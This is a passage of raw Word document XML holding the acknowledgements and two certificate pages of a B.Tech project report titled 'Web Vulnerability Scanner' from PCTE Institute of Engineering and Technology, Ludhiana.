          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>On the very outset I would like to thank the almighty GOD for showering his blessing &amp; providing me with the courage, motivation &amp; strength to complete my project.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:left w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:bottom w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:right w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:between w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>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after="120" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Every Project work demands a lot of hard work, time, patience and concentration. While working on this seminar, apart from these aspects, I have developed necessary skills and attitude, which are always required in a professional field. I am thankful to all those who helped me in completing this project.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>I express my deep sense of gratitude &amp; indebtness towards my respected Project In-charge "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Jahanvi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>", and faculty members of PCTE Institute of Engineering and Technology from whom I have learnt the technical skills for completion of this Project. Without their guidance, I would have found it really difficult to undertake the project work. I would like to thank them for their ever available, unconditional help &amp; guidance that they made available throughout the project work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>I would also like to acknowledge the encouraging attitude of my friends &amp; other staff members of P.C.T.E family that helped me to complete the project work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Batang"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Batang"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">                                                         </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Batang"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Batang"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Batang"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">                                                                                                                                                      (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="Batang"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Gureet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Batang"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Batang"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Batang"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Batang"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Certificate from Organization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>This is to certify that format and quality of presentation of project report submitted by</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Gureet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As one of the requirements for the degree of </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>B.Tech Computer Science and Engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">is acceptable to </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Department of Computer Science and Engineering,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PCTE, Ludhiana</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6705"/>
        </w:tabs>
        <w:spacing w:after="280" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6705"/>
        </w:tabs>
        <w:spacing w:after="280" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6705"/>
        </w:tabs>
        <w:spacing w:after="280" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Head of Dept.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="PMingLiU"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="PMingLiU"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="PMingLiU"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>______________</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PCTE Institute of Engineering and Technology</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="PMingLiU"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Ludhiana</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Batang"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Batang"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Certificate from Internal Guide</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Batang"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="PMingLiU"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="PMingLiU"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Thi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>s is to certify that the project</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="PMingLiU"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> title “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Web Vulnerability Scanner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="PMingLiU"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">” submitted for the degree of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tech Computer Science and Engineering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the project of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>PCTE Institute of Engineering and Technology</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ludhiana</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> affiliated to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>PTU, Jalandhar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="PMingLiU"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> is a benefited research which is carried out under my supervi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>sion and no part of this project</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="PMingLiU"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> has been for any other degree. The student has worked very hard a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>nd sincerely during this project</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="PMingLiU"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="PMingLiU"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="PMingLiU"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="PMingLiU"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Project</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="PMingLiU"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> Supervisor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="PMingLiU"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="PMingLiU"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="PMingLiU"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="PMingLiU"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> Jahanvi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="PMingLiU"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="PMingLiU"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="PMingLiU"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="PMingLiU"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Faculty</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="PMingLiU"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>, PCTE)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="PMingLiU"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="PMingLiU"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Ludhian</w:t>
      </w:r>
      <w:r>
